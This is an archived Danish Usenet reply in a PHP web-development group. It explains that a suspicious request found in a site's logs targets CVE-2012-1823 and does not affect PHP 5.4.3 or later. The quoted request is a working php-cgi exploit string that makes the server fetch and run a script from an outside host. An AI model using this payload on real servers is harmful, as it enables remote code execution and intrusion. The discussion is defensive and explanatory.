Groups | Search | Server Info | Keyboard shortcuts | Login | Register [http] [https] [nntp] [nntps]

Groups > dk.edb.internet.webdesign.serverside.php > #7254

Re: Ondsindet request

Path csiph.com!eternal-september.org!feeder.eternal-september.org!reader01.eternal-september.org!.POSTED!not-for-mail
From Jan Hansen <jhjjhjhhansen@gmail.com>
Newsgroups dk.edb.internet.webdesign.serverside.php
Subject Re: Ondsindet request
Date Wed, 15 Apr 2020 14:19:06 +0200
Organization A noiseless patient Spider
Lines 25
Message-ID <20200415141906.726ca602f38e2a74861b5b75@gmail.com> (permalink)
References <1tdp12me6kivq.dlg@lundhansen.dk>
Mime-Version 1.0
Content-Type text/plain; charset=UTF-8
Content-Transfer-Encoding 8bit
Injection-Info reader02.eternal-september.org; posting-host="6ecfaf4b687ddb4ed46085587d261ad3"; logging-data="3502"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX18FQchpJDOdX79LiYgCfAZkGbxiUzgKBLQ="
User-Agent Sylfide for Fedora (sylpheed.sraoss.jp)
Cancel-Lock sha1:J88aXqdeIJUugmJPE+2+9DOsMDs=
face iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAMAAABg3Am1AAAAM1BMVEVAAAAEAgccGRcrKytDLQd pRQVKTEyPYw5naGazfQTNlQi3mFehnZfxuADsyBPLzMn6/PhA/qUdAAAAAXRSTlMAQObYZgAAAA FiS0dEAIgFHUgAAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfgAg8RLTjt/9kiAAABlklEQVRIx7WV27qEIAiFB80TI+H7P+0Gm4OWTXax+bqi9csSjR6PccDjTsArburtLPFeP/pJ4g1YM+cKuvgfwKsZG/2sJV9Y9FyKnwSyZQ+R9ZkDojbURwCeruCI8GlqhQkCbCJaJchNAg6rfl3xHoCYZi0FFDHiM8thTBDgWYiUMrOBaKYAzk+Rl8Izt0PaX1ijlO2s4UqfRbjJS8nXJcCUNi6vrFzVDrAXhH6Y6qY60o3kayA36wvhwf4gQBrfORIEwPwEuOwi2h/DAPYFtIappk5uEZQjANXUiSN/BAqc7kLyeQCY086eAmYM6Gzke0AdRkfAnFlCMgNLbLbRP9LTgKC1AgYPepktMo1g31hZRIG0HlevEXb7YEnJrmWy9cBbXw1we/ekakpJFxwDJLPItIBIcas/tkSrzMf2rn7f0Bggio0lv7RvaAzg15CFDsC+pZ+0ey8v7XQ40ncFCIP8TaLf5sUHwO7kpG+IDfCNF4DpcNAhBMVU71pAjwBTGH/STqHglia1SCaFcD75nHN9Ytln/gB2JSmlFxN3ggAAAABJRU5ErkJggg==
X-Newsreader Sylpheed 3.7.0 (GTK+ 2.24.27; x86_64-unknown-linux-gnu)
Xref csiph.com dk.edb.internet.webdesign.serverside.php:7254

Show key headers only | View raw

Bertel Lund Hansen skrev:

> Jeg er ved at lege med lidt statistik på Fidusos sider, og i den
> forbindelse aflæste jeg bl.a. $_SERVER['REQUEST_URI']. Jeg skrev
> de fundne data til en tekstfil som jeg så vil bearbejde med et
> statistikprogram.
> 
> I datafilen forekom så følgende request:
> /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp://tenderplus.spb.ru//components/com_foxcontact/default.txt

Hvis du bruger php 5.4.3 eller nyere på det domæne, sker der ikke 
noget ved det. Fra <https://www.cvedetails.com/cve/CVE-2012-1823>:
"sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, 
when configured as a CGI script (aka php-cgi), does not properly 
handle query strings that lack an = (equals sign) character, which 
allows remote attackers to execute arbitrary code by placing 
command-line options in the query string, related to lack of 
skipping a certain php_getopt for the 'd' case. ".



-- 
mvh Jan.
Help Microsoft stamp out piracy. Give
Linux to a friend today!

Back to dk.edb.internet.webdesign.serverside.php | Previous | NextPrevious in thread | Next in thread | Find similar

Thread

Ondsindet request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-14 22:00 +0200
  Re: Ondsindet request Arne Vajhøj <arne@vajhoej.dk> - 2020-04-14 16:19 -0400
    Re: Ondsindet request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-15 09:13 +0200
      Re: Ondsindet request Martin Larsen <martin+spamfree+larsen@bigfoot.com> - 2020-04-15 10:16 +0200
      Re: Ondsindet request Arne Vajhøj <arne@vajhoej.dk> - 2020-04-15 08:30 -0400
        Re: Ondsindet request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-15 16:41 +0200
          Re: Ondsindet request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-15 16:43 +0200
  Re: Ondsindet request Jan Hansen <jhjjhjhhansen@gmail.com> - 2020-04-15 14:19 +0200
    Re: Ondsindet request Bertel Lund Hansen <gadekryds@lundhansen.dk> - 2020-04-15 16:38 +0200

csiph-web